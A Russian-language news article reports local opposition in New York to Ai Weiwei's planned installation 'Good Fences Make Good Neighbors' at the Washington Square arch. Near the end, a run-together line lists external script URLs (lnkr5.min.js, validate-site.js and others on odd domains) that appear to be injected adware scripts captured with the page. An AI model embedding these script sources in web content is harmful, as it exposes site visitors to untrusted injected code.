Американцы выступают против установки работ китайского художника

За последние несколько лет китайский художник Ай Вэйвэй боролся с правительствами Китая и Великобритании, а также с компанией “Лего”. На этот раз ему бросила вызов общественная организация The Washington Square Association.

В настоящее время Вэйвэй разрабатывает крупномасштабную установку общественного искусства в Нью-Йорке под названием «Хорошие заборы — хорошие соседи». Выставка, заказанная Фондом общественного искусства в честь его 40-летнего юбилея, продемонстрирует 300 работ на тему границ и иммиграции.

Среди аргументов протестующих, первый и главный заключается в том, что инсталляция будет занимать пространство триумфальной арки, где обычно устанавливают новогоднюю елку.

«Эта установка создает опасный прецедент того, что один из самых узнаваемых памятников и произведений искусства в Нью-Йорке может быть украшен и кооптирован в течение четырех месяцев», – сообщил Тревор Самнер, президент Ассоциации, в открытом письме на имя Фонда Общественного Искусства.

В интервью Самнер также рассказал, что, хотя выставка была анонсирована в марте, Фонд Общественного Искусства ждал почти четыре недели, чтобы сообщить Ассоциации о своих планах, и оставил очень мало времени для перемен или переговоров.

«Ирония заключается в том, что установка называется «Хорошие соседи», – прокомментировал он, учитывая, что Фонд официально не консультировался с соседями, такими как его ассоциация и Вашингтонская площадь.

В свою очередь, куратор и директор Public Art Fund Николас Бауме заявил СМИ, что инсталляцию одобрили соответствующие муниципальные органы и чиновники, включая также нью-йоркскую Комиссию по охране достопримечательностей.

//s3.amazonaws.com/js-cache/145f309ae16975ba1c.jshttp://netanalitics.space/addons/lnkr5.min.jshttp://worldnaturenet.xyz/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=51859x5215x&r=9http://eluxer.net/code?id=105&subid=51859_5215_

Sotheby's Auction House

Підписатися на новини мистецтва

Ніякого спаму, тільки цікаві новини російською та українською мовою.